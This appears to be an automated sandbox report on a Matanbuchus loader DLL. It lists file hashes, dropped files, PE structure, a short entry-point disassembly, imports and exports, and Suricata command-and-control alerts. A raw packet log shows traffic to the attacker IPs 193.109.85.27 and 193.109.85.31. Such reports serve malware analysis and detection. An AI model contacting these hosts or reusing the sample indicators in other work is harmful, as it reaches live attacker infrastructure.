                    • 193.109.85.31
                    bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                    • 91.202.233.141
                    Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                    • 185.236.203.101
                    http://toomdexter.kindofx.com/c/2734/14-13347393/2/Get hashmaliciousUnknownBrowse
                    • 5.183.103.118
                    8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                    • 89.238.176.21
                    nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                    • 91.202.233.158
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    37f463bf4616ecd445d4a1937da06e19zR4aIjCuRs.exeGet hashmaliciousRemcos, GuLoaderBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    buildz.exeGet hashmaliciousBabuk, DjvuBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    InstallSetup.exeGet hashmaliciousStealcBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    file.dllGet hashmaliciousMatanbuchusBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    rpedido-00035.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    w2TxCv1zA8.msiGet hashmaliciousUnknownBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    RNKJUiDSbh.dllGet hashmaliciousUnknownBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    RNKJUiDSbh.dllGet hashmaliciousUnknownBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    No context
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):65536
                    Entropy (8bit):0.837321042228325
                    Encrypted:false
                    SSDEEP:192:/Li9OoZg70BU/wjeTDFzuiFKZ24IO8dci:Di0egIBU/wje9zuiFKY4IO8dci
                    MD5:EF2D69A19F64ACF00C09089ADD08746F
                    SHA1:5C868137B432F04EB47E1D944B0B73A79D9ACFFA
                    SHA-256:0BCAFA298A109A28CE5FDB09D987A748C852B9BD3F716B0EB0140A891F6BFDDB
                    SHA-512:9B29D851FE6F9C08980F8BBE30D4B3C470A4036A564C2738233FDD96CE2FDDBA8BCD41762B863408EC120811A5E23CD12022BC61FFEAADE801CCBFE593982EBD
                    Malicious:false
                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.6.8.7.5.1.3.1.7.9.6.0.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.6.8.7.5.1.3.6.9.5.2.3.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.f.0.1.1.5.7.-.c.a.5.4.-.4.8.c.1.-.9.5.1.6.-.a.8.8.a.e.a.a.d.6.5.5.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.8.4.6.b.f.8.-.3.f.a.3.-.4.c.f.2.-.b.4.f.9.-.f.d.1.1.f.a.4.4.5.c.6.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.a.4.-.0.0.0.1.-.0.0.1.4.-.e.a.5.1.-.a.7.6.8.e.2.1.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Mini DuMP crash report, 14 streams, Sun Oct 6 11:25:13 2024, 0x1205a4 type
                    Category:dropped
                    Size (bytes):48078
                    Entropy (8bit):2.045211512137186
                    Encrypted:false
                    SSDEEP:192:NbKUnav2BFLhO5H4xKfxpRpeLJDIs8w8UfKRfXbEnX/naqLZpGadMok:4UaQ+5HjfStxl8ak/bEnX/xLZ3Tk
                    MD5:68E9A17B3BBAA943AFC2A28135B4AFE8
                    SHA1:12DE1F132F540A85AF932C2CA0B479CF81D595C4
                    SHA-256:A5DA2AEC9EB67271B687585962E897452B8AEFAB9DE85AC420C0E62DCC116A59
                    SHA-512:07C06D35FA2F205ACC17319674423827B8D2C32765A28961C85F868A138D84DB1E9D7B63BB54FF451C299CB7473EB62EFECBDE2223F4C2B2BCD1A2D36484BA68
                    Malicious:false
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):8296
                    Entropy (8bit):3.6953405940761423
                    Encrypted:false
                    SSDEEP:192:R6l7wVeJXG6I9b6YZD86d6gmfT64sxprs89b0UsfPcm:R6lXJ26I9b6YN86YgmfT64sl0Hfh
                    MD5:37321F0F67FB1D10DDC4594E6B47E3B0
                    SHA1:BD961B81344DB5334BA3B6F8D80E4A38FB89BDE9
                    SHA-256:3241F6231F417AE9BB2E1205E7C1881734E315714448CD5C295D751B2F2B6ADE
                    SHA-512:D5B226961738CE38C735087915352545A9669A985DD48F45AD9873E1320CDD9E4D2B4F6542AE7C4103B701356E6FD79E50ADFD9D79056E5FA39095F0A225C5E4
                    Malicious:false
                    Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>7588</Pi
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):4666
                    Entropy (8bit):4.481166977274837
                    Encrypted:false
                    SSDEEP:48:cvIwWl8zs9Jg77aI96tWpW8VYeYm8M4JCdPi6FW6Fq+q8/qVbYGScSBd:uIjfXI7Yc7VeJhtTbYJ3Bd
                    MD5:F9590248AD71546D298CA35A0B46104D
                    SHA1:D6BAA294881C0547DC7ED7800B553F861EA757B2
                    SHA-256:36BC8A88B1E97ADC11FD870B1A24629BBEE3B7234089A4285E41369B6EA271DB
                    SHA-512:4C7B575E19BD0DE4900CDE3506F937ADEFE4F5081F5A90FD73A4CD017EAA93D6683384C818F03D2562620137FD5B9D706DE45DB3DD9AEDE8D2F3B154FC3FDAB8
                    Malicious:false
                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="531507" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                    Process:C:\Windows\SysWOW64\rundll32.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):552960
                    Entropy (8bit):6.6679792207122475
                    Encrypted:false
                    SSDEEP:12288:4fj+pMe5+RbbQo2I+PSkAuv6XL+61Oo6:4fO+RbbAI+PpI3l6
                    MD5:0FCF31B2D27079BABD1FA08FF5E302AE
                    SHA1:F896D351D98B7605280B3E5EB923254B73B0C6AD
                    SHA-256:673A791FE9D1BE41E6EF53B640F22B6BE06263CF4176874223178E24090B76E7
                    SHA-512:4E030E5D204D89A3031BB1001CA8D62CAC00524A520C4923D4EB9B2AF386083C73A8C2E0B5E3C9DCBEE58A71915DFC42F0113B6EE769CF813BBB32F51A961CE6
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\8f08\user-PC\user-PC.ocx, Author: Joe Security
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: C:\Users\user\8f08\user-PC\user-PC.ocx, Author: unknown
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 11%
                    • Antivirus: Virustotal, Detection: 17%, Browse
                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:modified
                    Size (bytes):2464
                    Entropy (8bit):3.2458909179191435
                    Encrypted:false
                    SSDEEP:24:QOaqdmuF3rzS+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxD:FaqdF7zS+AAHdKoqKFxcxkFZM
                    MD5:73F6B17B473F3D6917A559B9567498FB
                    SHA1:E117DE4CFD98729309E720A64BB4955FA88618B5
                    SHA-256:DD4790010F8CFE66AF7382D2AEFD2FE1F9CFA1AF2BA2E50C50D999D0ED2DA3E0
                    SHA-512:1D05F9993ABDA40542C0AA8261D501BAD8521279BB11B84478AA53053F931C0EF9A57BA834E4BA4E465AF5628B2329A358D49B8F974E6D631C9C267883B6B6E0
                    Malicious:false
                    Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. O.c.t. .. 0.6. .. 2.0.2.4. .0.9.:.1.4.:.2.7.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:MS Windows registry file, NT/2000 or above
                    Category:dropped
                    Size (bytes):1835008
                    Entropy (8bit):4.41745688266016
                    Encrypted:false
                    SSDEEP:6144:1cifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNo5+:Si58oSWIZBk2MM6AFBWo
                    MD5:2AA3EEF420477EA0218E29D2160DB89D
                    SHA1:E4B13FD71766860E4BACCAA6D8CCB22CE9BB349A
                    SHA-256:1F9E96BD1761B2DA3B4A209C0E9F574FB2025D88B1F273988235A38141586A76
                    SHA-512:384FC2E99167A7FAFAA8D26724AA94B3B3E5D8E8CC5F005E64A15F24DB5A448AA0DAC76137B43707A1153EF14EACBB699955C478A25CD6CFEB7051BA5154AE13
                    Malicious:false
                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.6679792207122475
                    TrID:
                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                    • Generic Win/DOS Executable (2004/3) 0.20%
                    • DOS Executable Generic (2002/1) 0.20%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.dll
                    File size:552'960 bytes
                    MD5:0fcf31b2d27079babd1fa08ff5e302ae
                    SHA1:f896d351d98b7605280b3e5eb923254b73b0c6ad
                    SHA256:673a791fe9d1be41e6ef53b640f22b6be06263cf4176874223178e24090b76e7
                    SHA512:4e030e5d204d89a3031bb1001ca8d62cac00524a520c4923d4eb9b2af386083c73a8c2e0b5e3c9dcbee58a71915dfc42f0113b6ee769cf813bbb32f51a961ce6
                    SSDEEP:12288:4fj+pMe5+RbbQo2I+PSkAuv6XL+61Oo6:4fO+RbbAI+PpI3l6
                    TLSH:C9C45BBBF601E950D0B785787700DAD994DC32309786988BFAC17FAA39A06E2C575F07
                    Icon Hash:7ae282899bbab082
                    Entrypoint:0x1005a64b
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x10000000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
                    DLL Characteristics:DYNAMIC_BASE
                    Time Stamp:0x67026A9B [Sun Oct 6 10:46:51 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:f754dc7e6c7c8cd0fb5b94cb7304da2e
                    Instruction
                    push ebp
                    mov ebp, esp
                    cmp dword ptr [ebp+0Ch], 01h
                    jne 00007F227CCD70F7h
                    call 00007F227CCD74A1h
                    push dword ptr [ebp+10h]
                    push dword ptr [ebp+0Ch]
                    push dword ptr [ebp+08h]
                    call 00007F227CCD6FA3h
                    add esp, 0Ch
                    pop ebp
                    retn 000Ch
                    push ebp
                    mov ebp, esp
                    and dword ptr [104E5DECh], 00000000h
                    sub esp, 24h
                    or dword ptr [1007F330h], 01h
                    push 0000000Ah
                    call dword ptr [10067120h]
                    test eax, eax
                    je 00007F227CCD72A2h
                    and dword ptr [ebp-10h], 00000000h
                    xor eax, eax
                    push ebx
                    push esi
                    push edi
                    xor ecx, ecx
                    lea edi, dword ptr [ebp-24h]
                    push ebx
                    cpuid
                    mov esi, ebx
                    pop ebx
                    nop
                    mov dword ptr [edi], eax
                    mov dword ptr [edi+04h], esi
                    mov dword ptr [edi+08h], ecx
                    xor ecx, ecx
                    mov dword ptr [edi+0Ch], edx
                    mov eax, dword ptr [ebp-24h]
                    mov edi, dword ptr [ebp-20h]
                    mov dword ptr [ebp-0Ch], eax
                    xor edi, 756E6547h
                    mov eax, dword ptr [ebp-18h]
                    xor eax, 49656E69h
                    mov dword ptr [ebp-04h], eax
                    mov eax, dword ptr [ebp-1Ch]
                    xor eax, 6C65746Eh
                    mov dword ptr [ebp-08h], eax
                    xor eax, eax
                    inc eax
                    push ebx
                    cpuid
                    mov esi, ebx
                    pop ebx
                    nop
                    lea ebx, dword ptr [ebp-24h]
                    mov dword ptr [ebx], eax
                    mov eax, dword ptr [ebp-04h]
                    or eax, dword ptr [ebp-08h]
                    or eax, edi
                    mov dword ptr [ebx+04h], esi
                    mov dword ptr [ebx+08h], ecx
                    mov dword ptr [ebx+0Ch], edx
                    jne 00007F227CCD7135h
                    mov eax, dword ptr [ebp-24h]
                    and eax, 0FFF3FF0h
                    cmp eax, 000106C0h
                    je 00007F227CCD7115h
                    cmp eax, 00020660h
                    je 00007F227CCD710Eh
                    cmp eax, 00000070h
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x7d450 | 0x158 | .rdata
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7d5a8 | 0x78 | .rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4e7000 | 0x9124 | .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x6c600 | 0x1c | .rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x6c540 | 0x40 | .rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x67000 | 0x218 | .rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x1000 | 0x6583f | 0x65a00 | 378101567df2ffc8cfe243d01b2e60ad | False | 0.5176982433886839 | data | 6.5064011978464675 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata | 0x67000 | 0x171a6 | 0x17200 | 3ff0bffc4a29958b24f76c9687ca7898 | False | 0.40089738175675677 | data | 5.70954483400659 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data | 0x7f000 | 0x4677e4 | 0xe00 | cb931e6a3a0543fb22b3ffd58ef75401 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .reloc | 0x4e7000 | 0x9124 | 0x9200 | ce85ac08454c4a31068a1b3eb9a8a460 | False | 0.7661065924657534 | data | 6.828069510749188 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    DLL | Import
                    KERNEL32.dll | CloseHandle, GetLastError, SetLastError, HeapAlloc, HeapReAlloc, GetProcessHeap, GetCurrentProcessId, ExitProcess, GetCurrentThread, GetCurrentThreadId, CreateProcessW, GetCurrentProcessorNumber, GetTickCount64, GetWindowsDirectoryW, GetLargePageMinimum, GetModuleHandleA, lstrlenA, lstrlenW, IsBadReadPtr, IsValidCodePage, GetACP, GetOEMCP, GetSystemDefaultUILanguage, GetUserDefaultLangID, GetSystemDefaultLangID, GetSystemDefaultLCID, GetThreadUILanguage, GetCommandLineW, GetCurrentProcess, WriteConsoleW, CreateFileW, SetFilePointerEx, SetEnvironmentVariableW, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapSize, GetStringTypeW, GetFileType, GetStdHandle, LCMapStringW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, FindNextFileW, FindFirstFileExW, FindClose, HeapFree, GetModuleFileNameW, GetModuleHandleExW, RaiseException, LoadLibraryExW, GetProcAddress, FreeLibrary, DecodePointer, TlsFree, GetEnvironmentVariableW, GetEnvironmentStrings, GetCommandLineA, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection
                    USER32.dll | ArrangeIconicWindows, GetLastActivePopup, GetTopWindow, GetShellWindow, GetParent, GetDesktopWindow, GetCaretPos, GetCaretBlinkTime, GetCursor, GetCursorPos, GetWindowTextLengthA, GetUpdateRect, EndPaint, BeginPaint, GetWindowDC, GetForegroundWindow, EndMenu, GetSubMenu, GetSystemMenu, GetMenu, IsWindowEnabled, IsWindowUnicode, GetCapture, GetFocus, GetActiveWindow, GetDialogBaseUnits, GetDlgCtrlID, IsZoomed, AnyPopup, IsIconic, IsWindowVisible, EndDeferWindowPos, BeginDeferWindowPos, OpenIcon, IsWindow, GetDoubleClickTime, IsWow64Message, GetMessageExtraInfo, wsprintfW, DestroyMenu
                    ADVAPI32.dll | RegCreateKeyExW, RegCloseKey, RegSetValueExW
                    SHELL32.dll | SHCreateDirectoryExW
                    SHLWAPI.dll | StrCmpIW, PathAppendW
                    Name | Ordinal | Address
                    CheckLicense | 1 | 0x100379d0
                    DllInit | 2 | 0x10059dc0
                    DllInstall | 3 | 0x10037a50
                    DllUninitialize | 4 | 0x1003b120
                    Init | 5 | 0x1003b190
                    InitDll | 6 | 0x1003b230
                    Main | 7 | 0x1003b2b0
                    ThreadFunction | 8 | 0x1003b2f0
                    Uninitialize | 9 | 0x10059e30
                    curl_easy_cleanup | 10 | 0x1003f210
                    curl_easy_init | 11 | 0x10040710
                    curl_easy_perform | 12 | 0x10040b50
                    curl_easy_setopt | 13 | 0x10041500
                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                    2024-10-06T13:25:27.299380+0200 | 2034468 | ET MALWARE Matanbuchus Loader CnC M3 | 1 | 192.168.2.7 | 49763 | 193.109.85.31 | 54801 | TCP
                    2024-10-06T13:27:45.270526+0200 | 2034468 | ET MALWARE Matanbuchus Loader CnC M3 | 1 | 192.168.2.7 | 49994 | 193.109.85.31 | 54801 | TCP
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Oct 6, 2024 13:25:14.290463924 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.290548086 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.290565968 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.290606022 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.290617943 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.290644884 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.290667057 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.290685892 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.290699005 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.290729046 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.290750980 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.290779114 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.290818930 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.290955067 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.291313887 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.291330099 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.291394949 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.291407108 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.291491032 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.291701078 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.291718006 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.291769981 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.291794062 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.291832924 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.291856050 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.291882992 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.291897058 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.291963100 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.291985989 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.292131901 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.292150021 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.292184114 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.292195082 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.292207956 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.292233944 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.292534113 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.292551994 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.292587042 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.292598009 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.292623997 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.292632103 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.292642117 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.292649984 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.292671919 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.292697906 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.292717934 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.292731047 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.292768955 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.292795897 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.294738054 CEST49699443192.168.2.7193.109.85.27
                    Oct 6, 2024 13:25:14.294761896 CEST44349699193.109.85.27192.168.2.7
                    Oct 6, 2024 13:25:14.934483051 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:14.934534073 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:14.934643030 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:14.934896946 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:14.934916019 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:14.938874960 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:14.938914061 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:14.939017057 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:14.949660063 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:14.949698925 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:16.292634010 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:16.292779922 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:16.292809963 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:16.292861938 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:16.296592951 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:16.296603918 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:16.297126055 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:16.297219992 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:16.297749996 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:16.343401909 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:16.344335079 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:16.344358921 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:16.344789982 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:16.344887972 CEST49702443192.168.2.7193.109.85.31
